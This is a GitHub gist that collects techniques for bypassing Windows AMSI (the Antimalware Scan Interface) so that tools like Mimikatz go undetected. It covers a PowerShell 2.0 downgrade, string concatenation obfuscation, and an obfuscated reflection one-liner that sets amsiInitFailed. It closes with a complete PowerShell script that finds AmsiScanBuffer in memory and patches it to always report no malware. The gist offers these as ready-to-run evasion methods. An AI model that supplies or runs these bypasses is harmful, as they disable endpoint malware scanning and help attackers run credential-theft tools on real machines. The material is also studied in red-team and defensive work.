Skip to content

Instantly share code, notes, and snippets.

@D3Ext

D3Ext/amsi-bypass.md

Last active June 25, 2025 02:06
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save D3Ext/bf57673644ba08e729f65892e0dae6c4 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save D3Ext/bf57673644ba08e729f65892e0dae6c4 to your computer and use it in GitHub Desktop.
Download ZIP
All methods to bypass AMSI (2022)
Raw
amsi-bypass.md

To perform all this techniques you can simply try them by typing "Invoke-Mimikatz" into your powershell terminal, you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if the AMSI is off or you avoid it, it just will say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed the AMSI

Powershell downgrade

The first and worst way to bypass AMSI is downgrading powershell version to 2.0.

Just execute this

powershell -version 2.0

And now if you enter "Invoke-Mimikatz" it won't be flagged as malicious

¿Why is this method bad?

  • Because a lot of scripts won't work with this version

Forcing an error

Using Obfuscation

You can use simple obfuscation like summing strings like this:

"In"+"vo"+"ke"+"-M"+"im"+"ik"+"at"+"z"

And it also won't be detected

Patch Method

Here down you have a script which adds a "patch" in memory and deactivate the AMSI

Memory Hijacking

The script hooks the AmsiScanBuffer() function to always return "no malware". Just execute it and it should work

Obfuscated One-Liner

With this:

$a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.{0}{1}Utils'-f $b,$a)); $z=$Ref.GetField(('am{0}InitFailed'-f$a),'NonPublic,Static');$z.SetValue($null,$true)

You can deactivate the AMSI on the go without downloading any extra files (best technique)

References

https://www.hackingarticles.in/a-detailed-guide-on-amsi-bypass/

by D3Ext

Raw
amsi-scan-patch.ps1
Write-Host ""
$Kernel32 = @"
using System;
using System.Runtime.InteropServices;
public class Kernel32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string lpLibFileName);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Kernel32
Class Hunter {
static [IntPtr] FindAddress([IntPtr]$address, [byte[]]$egg) {
while ($true) {
[int]$count = 0
while ($true) {
[IntPtr]$address = [IntPtr]::Add($address, 1)
If ([System.Runtime.InteropServices.Marshal]::ReadByte($address) -eq $egg.Get($count)) {
$count++
If ($count -eq $egg.Length) {
return [IntPtr]::Subtract($address, $egg.Length - 1)
}
} Else { break }
}
}
return $address
}
}
[IntPtr]$hModule = [Kernel32]::LoadLibrary("amsi.dll")
Write-Host "[+] AMSI DLL Handle: $hModule"
[IntPtr]$dllCanUnloadNowAddress = [Kernel32]::GetProcAddress($hModule, "DllCanUnloadNow")
Write-Host "[+] DllCanUnloadNow address: $dllCanUnloadNowAddress"
If ([IntPtr]::Size -eq 8) {
Write-Host "[+] 64-bits process"
[byte[]]$egg = [byte[]] (
0x4C, 0x8B, 0xDC, # mov r11,rsp
0x49, 0x89, 0x5B, 0x08, # mov qword ptr [r11+8],rbx
0x49, 0x89, 0x6B, 0x10, # mov qword ptr [r11+10h],rbp
0x49, 0x89, 0x73, 0x18, # mov qword ptr [r11+18h],rsi
0x57, # push rdi
0x41, 0x56, # push r14
0x41, 0x57, # push r15
0x48, 0x83, 0xEC, 0x70 # sub rsp,70h
)
} Else {
Write-Host "[+] 32-bits process"
[byte[]]$egg = [byte[]] (
0x8B, 0xFF, # mov edi,edi
0x55, # push ebp
0x8B, 0xEC, # mov ebp,esp
0x83, 0xEC, 0x18, # sub esp,18h
0x53, # push ebx
0x56 # push esi
)
}
[IntPtr]$targetedAddress = [Hunter]::FindAddress($dllCanUnloadNowAddress, $egg)
Write-Host "[+] Targeted address: $targetedAddress"
$oldProtectionBuffer = 0
[Kernel32]::VirtualProtect($targetedAddress, [uint32]2, 4, [ref]$oldProtectionBuffer) | Out-Null
$patch = [byte[]] (
0x31, 0xC0, # xor rax, rax
0xC3 # ret
)
[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $targetedAddress, 3)
$a = 0
[Kernel32]::VirtualProtect($targetedAddress, [uint32]2, $oldProtectionBuffer, [ref]$a) | Out-Null
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment